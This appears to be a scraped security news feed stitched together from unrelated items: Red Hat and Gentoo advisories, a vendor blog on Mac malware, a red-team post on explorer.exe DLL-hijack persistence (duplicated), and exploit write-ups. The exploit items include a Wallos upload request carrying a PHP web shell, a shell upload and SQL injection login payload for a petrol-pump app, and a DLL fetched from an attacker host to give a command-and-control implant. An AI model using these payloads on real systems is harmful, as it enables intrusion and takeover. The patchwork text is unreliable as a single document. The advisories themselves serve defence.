Red Hat Security Advisory 2024-1071-03 - An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1071.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:12 security updateAdvisory ID:        RHSA-2024:1071-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1071Issue date:         2024-03-04Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for the postgresql:12 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1071-03

Last year, 11% of all detections on Macs were caused by malware. The illuminating figure gives a view into the world of Mac cyberthreats.

We’re going to let you in on a little cybersecurity secret… There’s malware on Mac computers. There pretty much always has been.

As revealed in our 2024 ThreatDown State of Malware report, a full 11% of all detections recorded by Malwarebytes on Mac computers in 2023 were for different variants of malware—the catch-all term that cybersecurity researchers use to refer to ransomware, trojans, info stealers, worms, viruses, and more.

That 11% figure may not sound imposing but remember that many people today still believe that Apple devices, including Mac computers, are invulnerable to cyberinfections because of some sort of vague “Apple magic.”

In reality, “Apple magic” is more a byproduct of old advertising (this 2006 commercial from the “I’m a Mac, and I’m a PC” series did irreparable harm) and faulty conclusions concerning cybersecurity’s biggest breaches and attacks: People mistakenly believe that because _most_ attacks target Windows computers and servers, _no_ attacks target Macs.

The truth is far more nuanced, as the visible, overwhelming focus of cyberattacks on Windows machines is a consequence of Microsoft’s long-standing success in business computing.

For decades, every multinational corporation, every local travel agency, every dentist, every hospital, every school, government, and city hall practically ran on Windows. This mass adoption was good for Microsoft and its revenue, but it also drew and maintained the interests of cybercriminals, who would develop malware that could impact the highest number of victims. This is why the biggest attacks, even today, predominantly target Windows-based malware and the sometimes-unpatched vulnerabilities found in Windows software and applications.  

Essentially, as Windows is the biggest target, cybercriminals zero in their efforts respectively.

But new information last year revealed that could all be changing.

****Mac malware tactics shifted in 2023****

Apple’s desktop and laptop operating system, macOS, represents a 31% share of US desktop operating systems, and roughly 25% of all businesses reportedly utilize Mac devices somewhere in their networks.

Already, the cybercriminals have taken note.

In April 2023, the most successful and dangerous ransomware in the world—LockBit—was found to have a variant developed for Mac. Used in at least 1,018 known attacks last year, LockBit ransomware, and the operators behind it, destroyed countless businesses, ruined many organizations, and, according to the US Department of Justice, brought in more than $120 million before being disrupted by a coordinated law enforcement effort in February of this year.

While the LockBit variant for Mac was not operational upon discovery, the LockBit ransomware gang said at the time that it was “actively being developed.” Fortunately, LockBit suffered enormous blows this year, and the ransomware gang is probably less concerned with Mac malware development and more concerned with “avoiding prison.”

Separately, in September 2023, Malwarebytes discovered a cybercriminal campaign that tricked Mac users into accidentally installing a type of malware that can steal passwords, browser data, cookies, files, and cryptocurrency. The malware, called Atomic Stealer (or AMOS for short) was delivered through “malvertising,” a malware delivery tactic that abuses Google ads to send everyday users to malicious websites that—though they may appear legitimate—fool people into downloading malware.

In this campaign, when users searched on Google for the financial marketing trading app “TradingView,” they were sometimes shown a malicious search result that appeared entirely authentic: a website with TradingView branding was visible, and download buttons for Windows, Mac, and Linux were clearly listed.

But users who clicked the Mac download button instead received AMOS.

This malvertising site mimics TradingView to fool users into downloading malware for different operating systems.

Just months later, AMOS again wriggled its way onto Mac computers, this time through a new delivery chain that has more typically targeted Windows users.

In November, Malwarebytes found AMOS being distributed through a malware delivery chain known as “ClearFake.” The ClearFake campaign tricks users into believing they’re downloading an approved web browser update. That has frequently meant a lot of malicious prompts mimicking Google Chrome’s branding and update language, but the more recent campaign imitated the default browser on Mac devices—Safari.

A template is used that mimics the official Apple websites and webpages to convince users into downloading a Safari “update” that instead contains malware.

As Malwarebytes Labs wrote at the time:

> “This may very well be the first time we see one of the main social engineering campaigns, previously reserved for Windows, branch out not only in terms of geolocation but also operating system.”

****Replace “magic” with Malwarebytes****

Cyberthreats on Mac aren’t non-existent, they’re just different. But different threats still need effective protection, which is where Malwarebytes Premium can help.

Malwarebytes Premium detects and blocks the most common infostealers that target Macs—including AMOS—along with annoying browser hijackers and adware threats such as Genieo, Vsearch, Crossrider, and more. Stay protected, proactively, with Malwarebytes Premium for Mac.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 No “Apple magic” as 11% of macOS detections last year came from malware 

Windows File Explorer is the is the graphical file management utility for the Windows operating system and the default desktop environment. Windows explorer was introduced… 
Continue reading → Persistence – Explorer

Skip to content

Windows File Explorer is the is the graphical file management utility for the Windows operating system and the default desktop environment. Windows explorer was introduced in Windows 95 and it is associated with the process _explorer.exe_. Since this is a native Windows process it could be used in red team operations for injection of arbitrary code. Processes which are missing DLL’s are prone to DLL Hijacking. Identification of missing DLL’s is trivial and requires process monitor to filter the _explorer.exe_ for results that contain _NAME NOT FOUND_. One of the missing DLL’s that _explorer.exe_ is missing is the cscapi.

Process Monitor – cscapi.dll

An HTTP server is required to serve the arbitrary DLL. From a Kali Linux box this is trivial by executing the following command:

    python3 -m http.server 8080

Python Web Server

A public tool has been released that will communicate with the host serving the arbitrary DLL, retrieve and write the DLL into _C:\\Windows_ path. The tool require the IP address and the port of the server hosting the DLL and the DLL name.

    DLLHijacking.exe 10.0.0.3 8080 demon.x64.dll

Explorer.exe – DLL Hijacking

Explorer.exe – cscapi.dll

The arbitrary DLL will load into the _explorer.exe_ process on the next reboot and a communication channel with the Command and Control will established.

Explorer.exe – Implant

Host Enumeration

**References**

1.  https://github.com/gavz/ExplorerPersist

**Post navigation**

Persistence – Explorer

Skip to content

Windows File Explorer is the is the graphical file management utility for the Windows operating system and the default desktop environment. Windows explorer was introduced in Windows 95 and it is associated with the process _explorer.exe_. Since this is a native Windows process it could be used in red team operations for injection of arbitrary code. Processes which are missing DLL’s are prone to DLL Hijacking. Identification of missing DLL’s is trivial and requires process monitor to filter the _explorer.exe_ for results that contain _NAME NOT FOUND_. One of the missing DLL’s that _explorer.exe_ is missing is the cscapi.

Process Monitor – cscapi.dll

An HTTP server is required to serve the arbitrary DLL. From a Kali Linux box this is trivial by executing the following command:

    python3 -m http.server 8080

Python Web Server

A public tool has been released that will communicate with the host serving the arbitrary DLL, retrieve and write the DLL into _C:\\Windows_ path. The tool require the IP address and the port of the server hosting the DLL and the DLL name.

    DLLHijacking.exe 10.0.0.3 8080 demon.x64.dll

Explorer.exe – DLL Hijacking

Explorer.exe – cscapi.dll

The arbitrary DLL will load into the _explorer.exe_ process on the next reboot and a communication channel with the Command and Control will established.

Explorer.exe – Implant

Host Enumeration

**References**

1.  https://github.com/gavz/ExplorerPersist

**Rate this:**

**Post navigation**

Gentoo Linux Security Advisory 202403-3 - Multiple vulnerabilities have been discovered in UltraJSON, the worst of which could lead to key confusion and value overwriting. Versions greater than or equal to 5.4.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-03  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: UltraJSON: Multiple Vulnerabilities  
     Date: March 03, 2024  
     Bugs: #855689  
       ID: 202403-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in UltraJSON, the worst of  
which could lead to key confusion and value overwriting.

Background  
==========

UltraJSON is an ultra fast JSON encoder and decoder written in pure C  
with bindings for Python 3.8+.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-python/ujson  < 5.4.0       >= 5.4.0

Description  
===========

Affected versions were found to improperly decode certain characters.  
JSON strings that contain escaped surrogate characters not part of a  
proper surrogate pair were decoded incorrectly. Besides corrupting  
strings, this allowed for potential key confusion and value overwriting  
in dictionaries. All users parsing JSON from untrusted sources are  
vulnerable. From version 5.4.0, UltraJSON decodes lone surrogates in the  
same way as the standard library's `json` module does, preserving them  
in the parsed output.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All UltraJSON users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/ujson-5.4.0"

References  
==========

[ 1 ] CVE-2022-31116  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31116  
[ 2 ] CVE-2022-31117  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31117

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-03

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-03

Gentoo Linux Security Advisory 202403-2 - Multiple vulnerabilities have been discovered in Blender, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 3.1.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-02  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Blender: Multiple Vulnerabilities  
     Date: March 03, 2024  
     Bugs: #834011  
       ID: 202403-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Blender, the worst of  
which could lead to arbitrary code execution.

Background  
==========

Blender is a 3D Creation/Animation/Publishing System.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-gfx/blender  < 3.1.0       >= 3.1.0

Description  
===========

Multiple vulnerabilities have been discovered in Blender. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Blender users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-gfx/blender-3.1.0"

References  
==========

[ 1 ] CVE-2022-0544  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0544  
[ 2 ] CVE-2022-0545  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0545  
[ 3 ] CVE-2022-0546  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0546

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-02

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-02

Wallos versions prior to 1.11.2 suffer from a remote shell upload vulnerability.

# Exploit Title: Wallos - File Upload RCE (Authenticated)  
# Date: 2024-03-04  
# Exploit Author: sml@lacashita.com  
# Vendor Homepage: https://github.com/ellite/Wallos  
# Software Link: https://github.com/ellite/Wallos  
# Version: < 1.11.2  
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.  
This can be bypassed to upload a malicious .php file.

POC  
---

1) Log into the application.  
2) Go to "New Subscription"  
3) Upload Logo and choose your webshell .php  
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php  
system($_GET['cmd']);  
?> 

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in:   
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php

Wallos Shell Upload

Gentoo Linux Security Advisory 202403-1 - A vulnerability has been discovered in Tox which may lead to remote code execution. Versions greater than or equal to 0.2.13 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202403-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Tox: Remote Code Execution  
     Date: March 03, 2024  
     Bugs: #829650  
       ID: 202403-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Tox which may lead to remote code  
execution.

Background  
==========

Tox is easy-to-use software that connects you with friends and family  
without anyone else listening in.

Affected packages  
=================

Package       Vulnerable    Unaffected  
------------  ------------  ------------  
net-libs/tox  < 0.2.13      >= 0.2.13

Description  
===========

A vulnerability has been discovered in btrbk. Please review the CVE  
identifier referenced below for details.

Impact  
======

A stack-based buffer overflow allows remote attackers to crash the  
process or potentially execute arbitrary code via a network packet.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Tox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-libs/tox-0.2.13"

References  
==========

[ 1 ] CVE-2021-44847  
      https://nvd.nist.gov/vuln/detail/CVE-2021-44847

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202403-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202403-01

Petrol Pump Management System version 1.0 suffers from a remote shell upload vulnerability. This is a variant vector of attack in comparison to the original discovery attributed to SoSPiro in February of 2024.

    # Exploit Title: File Upload Remote Code Execution (RCE) in Petrol PumpManagement Software v.1.0# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27747# Description: File Upload vulnerability in Petrol Pump Management Softwarev.1.0 allows an attacker to execute arbitrary code via a crafted payload tothe email Image parameter in the profile.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with default username=mayuri.infospace@gmail.com andPassword=admin3. Now go to "http://localhost/fuelflow/admin/profile.php"4. Upload the phpinfo.php file in "Image" field5. Phpinfo will be present in "http://localhost/fuelflow/assets/images/phpinfo.php" page6. The content of phpinfo.php file is given below:<?php phpinfo();?># Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27747.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27747

Petrol Pump Management System 1.0 Shell Upload

Petrol Pump Management Software version 1.0 suffers from a remote SQL injectionvulnerability.

    # Exploit Title: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0.# Date: 01-03-2024# Exploit Author: Shubham Pandey# Vendor Homepage: https://www.sourcecodester.com# Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html# Version: 1.0# Tested on: Windows, Linux# CVE : CVE-2024-27746# Description: SQL Injection vulnerability in Petrol Pump ManagementSoftware v.1.0 allows an attacker to execute arbitrary code via a craftedpayload to the email address parameter in the index.php component.# POC:1. Here we go to : http://localhost/fuelflow/index.php2. Now login with username: test@test.com';SELECT SLEEP(10)# andPassword=test3. Page will load for 10 seconds because of time-based sql injection# Reference:https://github.com/shubham-s-pandey/CVE_POC/blob/main/CVE-2024-27746.mdhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27746

Tag

#linux